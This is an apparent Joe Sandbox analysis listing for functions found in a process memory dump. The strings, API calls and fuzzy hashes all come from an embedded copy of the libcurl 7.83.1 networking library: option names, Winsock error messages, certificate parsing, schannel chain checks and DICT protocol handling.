String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
API String ID: 3873730638-2313236003
Opcode ID: 8cccdd7534c61115e4d099503e35826f3175b2a4b924ebb4b3c3dab671533ef5
Instruction ID: 8bb2f77641df08802286eef752fa63abe88fe5cf709aa830b94b44d8ee087f5b
Opcode Fuzzy Hash: 8cccdd7534c61115e4d099503e35826f3175b2a4b924ebb4b3c3dab671533ef5
Instruction Fuzzy Hash: 2E114832641F206BD7395B25AC91B96778C9F91BADF004025EDA5DA2C1E7E08B82C2D5

Function 000CA5C4 Relevance: 87.6, APIs: 4, Strings: 46, Instructions: 56stringCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA600
ioctlsocket.WS2_32(?,8004667E,?), ref: 000CA637
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CA641
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 000CA649

Strings

%s%c%s, xrefs: 000CA741
SWj, xrefs: 000CA965
https://, xrefs: 000CA69F
CURLOPT_TCP_FASTOPEN, xrefs: 000CA859
SWj, xrefs: 000CA929
CURLOPT_NOPROGRESS, xrefs: 000CA999
://, xrefs: 000CA6FF
SWj, xrefs: 000CA8ED
CURLOPT_NOBODY, xrefs: 000CA9B8
fcntl failed on fd=%d: %s, xrefs: 000CA654
SWj, xrefs: 000CA99E
Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!, xrefs: 000CA5F1
SWj, xrefs: 000CA892
CURLOPT_URL, xrefs: 000CA97C
proxy support is disabled in this libcurl, xrefs: 000CAA16
VLI, xrefs: 000CAA00
CURLOPT_WRITEFUNCTION, xrefs: 000CA8A9
CURLOPT_SEEKFUNCTION, xrefs: 000CA924
SWj, xrefs: 000CA9BD
http://, xrefs: 000CA68C
VI, xrefs: 000CA969
SWj, xrefs: 000CA878
ViI, xrefs: 000CA9E3
CURLOPT_PROXY, xrefs: 000CA9F7
wJ, xrefs: 000CA8D6
h,N, xrefs: 000CA8E3
SWj, xrefs: 000CA85E
SWj, xrefs: 000CA8CE
Ph', xrefs: 000CA9D4
CURLOPT_XOAUTH2_BEARER, xrefs: 000CA9DA
V;J, xrefs: 000CA911
VJ, xrefs: 000CA862
k%, xrefs: 000CA038
SWj, xrefs: 000CA83C
CURLOPT_READFUNCTION, xrefs: 000CA8E8
h+N, xrefs: 000CA8A4
CURLOPT_TCP_NODELAY, xrefs: 000CA837
CURLOPT_WRITEDATA, xrefs: 000CA873
SWj, xrefs: 000CA8AE
CURLOPT_BUFFERSIZE, xrefs: 000CA960
CURLOPT_INTERLEAVEDATA, xrefs: 000CA88D
V[J, xrefs: 000CA8F1
CURLOPT_READDATA, xrefs: 000CA8C9
SWj, xrefs: 000CA90D
ht', xrefs: 000CA7FE
CURLOPT_SEEKDATA, xrefs: 000CA908

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func_errnoioctlsocketstrerror
String ID: %s%c%s$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Ph'$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$V;J$VLI$V[J$ViI$VI$VJ$fcntl failed on fd=%d: %s$h+N$h,N$ht'$http://$https://$proxy support is disabled in this libcurl$k%$wJ
API String ID: 1657940537-1927208717
Opcode ID: 0a5f7abc3c84792fed769ff5132b36dfe2be7d617af68c903fd430193ef2a741
Instruction ID: bc53ce7e7cec1daf701315040798d8cd09954290dbb65695d02b67bd36aa0e7a
Opcode Fuzzy Hash: 0a5f7abc3c84792fed769ff5132b36dfe2be7d617af68c903fd430193ef2a741
Instruction Fuzzy Hash: E211A371B04A08AFEB089B60DD49FEC7BB2FF46318F14801DF801D6452DB759D91CA42

Function 000D9CA8 Relevance: 76.6, APIs: 1, Strings: 50, Instructions: 140stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Host not found,000000FF,?,000DA10B), ref: 000D9EF5

Strings

Protocol option is unsupported, xrefs: 000D9D56
Address family not supported, xrefs: 000D9D7E
Socket has been shut down, xrefs: 000D9E26
Descriptor is not a socket, xrefs: 000D9D2E
Too many users, xrefs: 000D9E81
Socket is already connected, xrefs: 000D9E12
Blocking call in progress, xrefs: 000D9D24
Host not found, xrefs: 000D9EE9
No data record of requested type, xrefs: 000D9ED4
Call interrupted, xrefs: 000D9CDE
Operation not supported, xrefs: 000D9D74
Connection was aborted, xrefs: 000D9DC4
Winsock library is not ready, xrefs: 000D9E9D
Protocol is unsupported, xrefs: 000D9D60
Address already in use, xrefs: 000D9D92
Unrecoverable error in call to nameserver, xrefs: 000D9EDB
Invalid arguments, xrefs: 000D9D06
Bad protocol, xrefs: 000D9D4C
Host down, xrefs: 000D9E62
Protocol family not supported, xrefs: 000D9D88
Winsock library not initialised, xrefs: 000D9EA4
Remote error, xrefs: 000D9E96
Bad file, xrefs: 000D9CE8
Name too long, xrefs: 000D9E58
Process limit reached, xrefs: 000D9E7A
Address not available, xrefs: 000D9D9C
Winsock version not supported, xrefs: 000D9EAB
Timed out, xrefs: 000D9E3A
Disconnected, xrefs: 000D9EB2
Connection refused, xrefs: 000D9E44
Socket is unsupported, xrefs: 000D9D6A
Too many references, xrefs: 000D9E30
Bad access, xrefs: 000D9CF2
Something is stale, xrefs: 000D9E8F
Loop??, xrefs: 000D9E4E
Need destination address, xrefs: 000D9D38
Connection was reset, xrefs: 000D9DCE
Host unreachable, xrefs: 000D9E6C
Not empty, xrefs: 000D9E73
Network has been reset, xrefs: 000D9DBA
Socket is not connected, xrefs: 000D9E1C
Bad message size, xrefs: 000D9D42
Network unreachable, xrefs: 000D9DB0
Out of file descriptors, xrefs: 000D9D10
No buffer space, xrefs: 000D9E08
Host not found, try again, xrefs: 000D9EE2, 000D9EF3
Call would block, xrefs: 000D9D1A
Bad argument, xrefs: 000D9CFC
Bad quota, xrefs: 000D9E88
Network down, xrefs: 000D9DA6

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: strncpy
String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
API String ID: 3301158039-3442644082
Opcode ID: ef9e607ec44ecfe6a757011c388057cef190958559fab8f667dd44b6bf6de6e1
Instruction ID: 129b0d7fc56179f8d16acaff338b921a8cabb99afda79fa7cd7fd9e10b3cbab5
Opcode Fuzzy Hash: ef9e607ec44ecfe6a757011c388057cef190958559fab8f667dd44b6bf6de6e1
Instruction Fuzzy Hash: E441345030D361978B38C62C67181799754EB12304B24427FB9A3EF799D25BCEA2A372

Function 0010E652 Relevance: 52.9, APIs: 13, Strings: 22, Instructions: 447COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 0010E702
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010E766
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EB75
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010EBBD

Strings

-----BEGIN CERTIFICATE-----, xrefs: 0010EB00
Cert, xrefs: 0010EB88
Subject, xrefs: 0010E6BE
Signature Algorithm, xrefs: 0010E891
Version, xrefs: 0010E7BE
Expire Date: %s, xrefs: 0010E96D
Signature: %s, xrefs: 0010EA6D
Start Date, xrefs: 0010E8F4
Public Key Algorithm, xrefs: 0010E9C6
Serial Number, xrefs: 0010E820
Issuer, xrefs: 0010E72B
%2d Subject: %s, xrefs: 0010E6E2
Version: %lu (0x%lx), xrefs: 0010E7F3
Expire Date, xrefs: 0010E957
Signature, xrefs: 0010EA57
Signature Algorithm: %s, xrefs: 0010E8A7
Start Date: %s, xrefs: 0010E90A
%lx, xrefs: 0010E7A1
Public Key Algorithm: %s, xrefs: 0010E9E5
Issuer: %s, xrefs: 0010E746
Serial Number: %s, xrefs: 0010E83B
-----END CERTIFICATE-----, xrefs: 0010EB4F

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: free
String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
API String ID: 1294909896-2896079655
Opcode ID: 5f479c1faacb3277777cf7cbfd251c5d8e717eeeb8ff6bde5d4a53cf4d9fd675
Instruction ID: 1e7e865f18ee466521bb3075e2d3bfe62548a1ed4aaaa1b5855267b218cdb3d5
Opcode Fuzzy Hash: 5f479c1faacb3277777cf7cbfd251c5d8e717eeeb8ff6bde5d4a53cf4d9fd675
Instruction Fuzzy Hash: 63E1E5717083629FD728AB61E894A6FB7D5EF94710F14882EF895932C1DBB09C05CBD2

Function 000C686E Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 382fileCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000C688D
___from_strstr_to_strchr.LIBCMT ref: 000C68A1
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 000C68C1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C68F7
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C691B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C697E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6988
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00118DD4), ref: 000C699E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C69DA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C69E6
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C6A30
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6A7A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6A96
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000C6AC9
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000C6AD9
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(001174AB), ref: 000C6AF9
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 000C6B14
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000C6B7F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6BD0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C6C50
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 000C6C58

Strings

Couldn't read data from file "%s", this makes an empty POST., xrefs: 000C69B4, 000C6B2E
f, xrefs: 000C6BFD
%.*s=%s, xrefs: 000C6945

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_func$_strdup$free$___from_strstr_to_strchrfclosefopenmalloc
String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$f
API String ID: 288693899-3884612863
Opcode ID: f7063d4e7c351e9d2b5e70016c32c893ee0a2d00bc7edb13af2b0159ed3590d1
Instruction ID: 72b0e8adfc397805cb398fde3bc54bb6abcb2144b360142a3340349fb8cc04eb
Opcode Fuzzy Hash: f7063d4e7c351e9d2b5e70016c32c893ee0a2d00bc7edb13af2b0159ed3590d1
Instruction Fuzzy Hash: 8EC1E4752087418FC769CF34D894EAEB7E2AFC9314F18492DF48697242DB72DC468B15

Function 0010F363 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 340encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 0010F4D6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F4E7
CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 0010F5D8
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F5E3
CertGetCertificateChain.CRYPT32(?,?,00000000,?,00000010,00000000,00000000,?), ref: 0010F698
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0010F6A3
CertFreeCertificateChainEngine.CRYPT32(00000000), ref: 0010F7C1
CertCloseStore.CRYPT32(?,00000000), ref: 0010F7D4
CertFreeCertificateChain.CRYPT32(00000000), ref: 0010F7E9
CertFreeCertificateContext.CRYPT32(00000000), ref: 0010F7FE

Strings

schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 0010F705
schannel: failed to create certificate chain engine: %s, xrefs: 0010F5F8
schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 0010F729
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 0010F6F6
schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 0010F4B8
schannel: CertGetCertificateChain failed: %s, xrefs: 0010F6B8
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 0010F711
schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 0010F71D
schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 0010F739
schannel: failed to create certificate store: %s, xrefs: 0010F4FC
schannel: Failed to read remote certificate context: %s, xrefs: 0010F7A4
(memory blob), xrefs: 0010F540

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Cert$Certificate$Chain$ErrorFreeLast$EngineStore$CloseContextCreateOpen
String ID: (memory blob)$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
API String ID: 713146188-3435997996
Opcode ID: ca9d9901fa38f32a906554963ad42f3bf8bfed2f0b00a7ae977ffc7fc63a2ca2
Instruction ID: 89912455f7997b3dbf8f38cc06e7a22b78cde3520a6e198488d17c393c18bd5c
Opcode Fuzzy Hash: ca9d9901fa38f32a906554963ad42f3bf8bfed2f0b00a7ae977ffc7fc63a2ca2
Instruction Fuzzy Hash: 21D1B270A00214DFDB398F14DC86BEA77B5AF49310F1441B9E989AB6D1DBB09D82CF91

Function 001030C0 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 261COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00103177
___from_strstr_to_strchr.LIBCMT ref: 001031BB
___from_strstr_to_strchr.LIBCMT ref: 001031CC
___from_strstr_to_strchr.LIBCMT ref: 001031E0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0010324F
___from_strstr_to_strchr.LIBCMT ref: 00103278
___from_strstr_to_strchr.LIBCMT ref: 0010328B
___from_strstr_to_strchr.LIBCMT ref: 0010329F
___from_strstr_to_strchr.LIBCMT ref: 001032B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00103337

Strings

lookup word is missing, xrefs: 001031F7, 001032CE
/LOOKUP:, xrefs: 00103163
/MATCH:, xrefs: 001030CD
/DEFINE:, xrefs: 0010313B
CLIENT libcurl 7.83.1DEFINE %s %sQUIT, xrefs: 0010322A
/FIND:, xrefs: 00103122
/M:, xrefs: 00103109
Failed sending DICT request, xrefs: 0010325E, 0010333E
/D:, xrefs: 00103150
CLIENT libcurl 7.83.1%sQUIT, xrefs: 0010319F
default, xrefs: 00103204, 001032DB
CLIENT libcurl 7.83.1MATCH %s %s %sQUIT, xrefs: 00103311

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: ___from_strstr_to_strchr$free
String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.83.1%sQUIT$CLIENT libcurl 7.83.1DEFINE %s %sQUIT$CLIENT libcurl 7.83.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
API String ID: 3654317688-2903917456
Opcode ID: a351b5bd82112912083b2b5306ba4b0866fb6cbc344b2eb3cba55aeeadc009e2
Instruction ID: eed981a9aeb865b6cc85af96aa2ba859a0c4ce8a168e298330e5e6e734f6ffaf
Opcode Fuzzy Hash: a351b5bd82112912083b2b5306ba4b0866fb6cbc344b2eb3cba55aeeadc009e2
Instruction Fuzzy Hash: 167174316083525FE729562C6C02B676BDDDFA6774F24002EF8D5AB2C2EFB18E418361

Function 000FFA70 Relevance: 35.3, APIs: 15, Strings: 5, Instructions: 321networkCOMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000FFAC5
WSACreateEvent.WS2_32 ref: 000FFB36
WSAGetLastError.WS2_32 ref: 000FFB46
WSAEventSelect.WS2_32(?,00000000,00000021), ref: 000FFB69
WSACloseEvent.WS2_32(00000000), ref: 000FFB75
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 000FFB84
GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000FFB97
WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1(00000001,?,00000000,00000064), ref: 000FFBD6

Strings

Time-out, xrefs: 000FFE1E
WSACloseEvent failed (%d), xrefs: 000FFE49
WSAEnumNetworkEvents failed (%d), xrefs: 000FFD1D
, xrefs: 000FFDA2
WSACreateEvent failed (%d), xrefs: 000FFB4D

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: Event$CloseCreateErrorFileHandleLastMultipleObjectsSelectTypeWaitcalloc
String ID: $Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
API String ID: 2419709179-2457143120
Opcode ID: a9f46520efbdfb9e2b93e152bbb1f050326ab9f9b87fe049c8f090455684506d
Instruction ID: a6ed672813e0e3577509c23cec0740a1203a5e200158472f519fb162f6d50274
Opcode Fuzzy Hash: a9f46520efbdfb9e2b93e152bbb1f050326ab9f9b87fe049c8f090455684506d
Instruction Fuzzy Hash: 07B1E1715083069FD724CF24C988BBE7BE6AF88710F14453EFA89DB691D77188419BA2

Function 000C1070 Relevance: 35.3, APIs: 9, Strings: 11, Instructions: 313fileCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C115C

Part of subcall function 000D027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,000C10B6), ref: 000D028E
Part of subcall function 000D027A: __alldvrm.LIBCMT ref: 000D02A7
Part of subcall function 000D027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000D02D1

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000C10C7
_localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 000C1116
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00116C58), ref: 000C117D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 000C1210
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 000C1221
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000001,?), ref: 000C12D3
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,?), ref: 000C1321
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000C1361

Strings

%s== Info: %.*s, xrefs: 000C13F2
<= Recv header, xrefs: 000C13CE
=> Send header, xrefs: 000C13C7
<= Recv data, xrefs: 000C13C0
[%zu bytes data], xrefs: 000C1256
Failed to create/open output, xrefs: 000C119F
%s%s , xrefs: 000C1244, 000C12B5, 000C1303, 000C1348
=> Send SSL data, xrefs: 000C13AB
<= Recv SSL data, xrefs: 000C13B2
%02d:%02d:%02d.%06ld , xrefs: 000C112B
=> Send data, xrefs: 000C13B9

Memory Dump Source

Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd

Similarity

API ID: __acrt_iob_funcfwrite$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_localtime64_time64fopen
String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]
API String ID: 4066690675-628975109
Opcode ID: 8f0d32c6faef9bedcd32f8b7bd4b8e230f494477b722c74f051801979121b109
Instruction ID: a2be65e50c9bb7081ea8d95208b58dd4d36ad9d6dc1f68950d71f9940b14188f
Opcode Fuzzy Hash: 8f0d32c6faef9bedcd32f8b7bd4b8e230f494477b722c74f051801979121b109
Instruction Fuzzy Hash: 76B1E171E04245AFCB25DFA89944FEE7BF5FB4A304F18412DE540A3A52D3729982CBA0

Function 000E78C7 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 282filestringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sha256//,00000008), ref: 000E7907
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7936
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7994
fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00118DD4), ref: 000E7AA3
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 000E7ABA
ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000E7ACE
fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 000E7ADF
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7B16
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 000E7B2E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7BB6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000E7BC8
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 000E7BCE

Strings

;sha256//, xrefs: 000E7A0F
public key hash: sha256//%s, xrefs: 000E79A5
